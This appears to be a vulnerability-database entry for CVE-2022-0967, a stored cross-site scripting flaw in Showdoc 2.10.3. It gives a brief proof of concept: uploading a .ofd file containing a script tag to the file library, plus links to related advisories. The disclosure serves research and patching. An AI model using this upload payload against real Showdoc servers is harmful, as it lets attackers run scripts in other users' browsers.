Lucene search
Akshay RaviPACKETSTORM:167198HistoryMay 17, 2022 - 12:00 a.m.
Showdoc 2.10.3 Cross Site Scripting
2022-05-1700:00:00
Akshay Ravi
packetstormsecurity.com
148
cross site scripting
stored xss
showdoc
file upload
cve-2022-0967
macos monterey
EPSS
0.001
Percentile
45.7%
`# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967
Description: Stored XSS via uploading file in .ofd format
1. Create a file with .ofd extension and add XSS Payload inside the file
filename = "payload.ofd"
payload = "<script>alert(1)</script>"
2. Login to showdoc v2.10.2 and go to file library
Endpoint = "https://www.site.com/attachment/index"
3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL
`
Related
cve
cve
CVE-2022-0967
2022-03-15 16:15:09
cnvd
cnvd
showdoc .ofd file upload vulnerability
2022-03-17 00:00:00
huntr
huntr
Stored XSS via File Upload in star7th/showdoc in star7th/showdoc
2022-03-14 14:39:26
zdt
zdt
Showdoc 2.10.3 - Stored Cross-Site Scripting Vulnerability
2022-05-17 00:00:00
github
github
Stored Cross-site Scripting in showdoc
2022-03-16 00:00:46
exploitdb
exploitdb
Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
2022-05-17 00:00:00
osv
osv
CVE-2022-0967
2022-03-15 16:15:09
Stored Cross-site Scripting in showdoc
2022-03-16 00:00:46
prion
prion
Cross site scripting
2022-03-15 16:15:00
cvelist
cvelist
nvd
nvd
CVE-2022-0967
2022-03-15 16:15:09
veracode
veracode
Cross-site Scripting (XSS)
2022-03-22 08:34:11